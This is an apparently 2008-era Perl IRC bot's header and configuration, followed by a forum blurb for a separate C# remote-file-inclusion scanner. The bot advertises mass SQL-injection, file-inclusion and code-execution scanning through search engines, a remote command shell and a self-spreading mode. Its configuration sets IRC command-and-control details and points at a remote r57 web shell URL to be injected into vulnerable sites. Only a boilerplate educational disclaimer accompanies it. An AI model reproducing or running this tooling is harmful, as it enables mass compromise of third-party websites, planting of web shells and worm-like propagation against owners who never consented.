---

#!/usr/bin/perl

  #####################################################################################
  ##                                                                                 ##
  ##                                                                   15/06/2008    ##
  ##  Author  : Osirys                                                               ##
  ##  WebSite :                                                                      ##
  ##  Contact : osirys[at]live[dot]it                                                ##
  ##  Italian Coder                                                                  ##
  ##                                                                                 ##
  ##  ## IMPORTANT ##                                                                ##
  ##   # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY          ##
  ##   # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!                     ##
  ##  ##                                                                             ##
  ##                                                                                 ##
  ##  Release: v6 Private                                                            ##
  ##      After the success of the v5, I decided to code a new release :-)           ##
  ##      This is a private script. If you have it, keep it priv8 !!!                ##
  ##                                                                                 ##
  ##  Features:                                                                      ##
  ##    [+]Sql Injection Scanner (Fixed a bug which release v5 was affected)         ##
  ##    [+]Remote File Inclusion Scanner                                             ##
  ##    [+]Local File Inclusion Scanner                                              ##
  ##    [+]Remote Code Execution Scanner                                             ##
  ##    [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains:                           ##
  ##      .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk  ##
  ##    [+]Integrated Shell, so you can execute commands on the server               ##
  ##    [+]Security Mode to protect "dangerous" functions                            ##
  ##    [+]Spread Mode, to activate or disable Spread Function                       ##
  ##    [+]Single Spread Mode, to spread on RFI vulnerable sites                     ##
  ##    [+]Bypass Engines ON: Google, Yahoo                                          ##
  ##    !: To "bypass" these engines, the Scanner just looks for websites on other   ##
  ##    engines that use the same bots than the main ones                            ##
  ##                                                                                 ##
  #####################################################################################


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id    = "http://ciro1992.org/ciao/id.txt??";               #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?";                                  #Shell printed on the Vulnerable Site
my $ircd  = "irc.oltreirc.net";                                                  #Irc-Server
my $port  = "6667";                                                           #Irc-Server Port
my $chan1 = "#osirys";                                                          #Chan for Scan
my $chan2 = "#Vuln";                                                          #Results will be printed here too
my $nick  = "v6";                                                      #Nick
my @admins = ("Osirys");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "";

my $spreadACT   = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd   = "lol"; #Password to Kill the Bot
my $chidpwd   = "lol"; #Password to change the RFI Response
my $cmdpwd    = "lol"; #Password to execute commands on the server
my $secpwd    = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd   != $killpwd;
my $badidpwd     != $chidpwd;
my $badcmdpwd    != $cmdpwd;
my $badsecpwd    != $secpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

---

mfg
Bloody

---

//  .'|. '||'  '|'  .|'''.|   ||   ..|''||   '|.   '|' //.||.    ||    |   ||..  '  ...  .|'    ||   |'|   | // ||     ||    |    ''|||.   ||  ||      ||  | '|. | // ||     ||    |  .     '||  ||  '|.     ||  |   ||| //.||.     '|..'   |'....|'  .||.  ''|...|'  .|.   '|    ____________ //| Project RFI by: fUSiON //| //| IRC: irc.milw0rm.com:6667 #fUSiON //| Email: rootbox@myway.com //| This win32 scanner search for rfi (remote file inclusion) vuln sites over google. The application was written in c#, so .Net 2.0 Framework is required to beeing able to run the Scanner. http://www.microsoft.com/downloads/details.aspx?familyid=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displaylang=en [UPDATED Versions] [27. 06. 2008, 04:28 GMT+01:00] // Version 2.41 - Fixed checkbox for specific parameter check [26. 06. 2008, 21:22 GMT+01:00] // Version 2.31 - Changed the pinging behaviour, a failed ping to google doesn't block the scanning module anymore [26. 06. 2008, 05:41 GMT+01:00] // Version 2.21 - Changed the checking code, doesn't check the first and the second parameter anymore, checks now every parameter in the url for rfi vulns - Changed the layout of the google scan module [25. 06. 2008, 10:13 GMT+01:00] // Version 2.1 - Fixed problems with reading/writing of files [25. 06. 2008, 09:09 GMT+01:00] - Fixed hanging scanner if there wasn't a match of the search string on google - Added finish scan message after scanning was completed [25. 06. 2008, 08:49 GMT+01:00] - Changed the checking function, the scanner should now be able to give a 99% sureness that vuln sites cause of an include or main remote file inclusion vulnerabillity.

---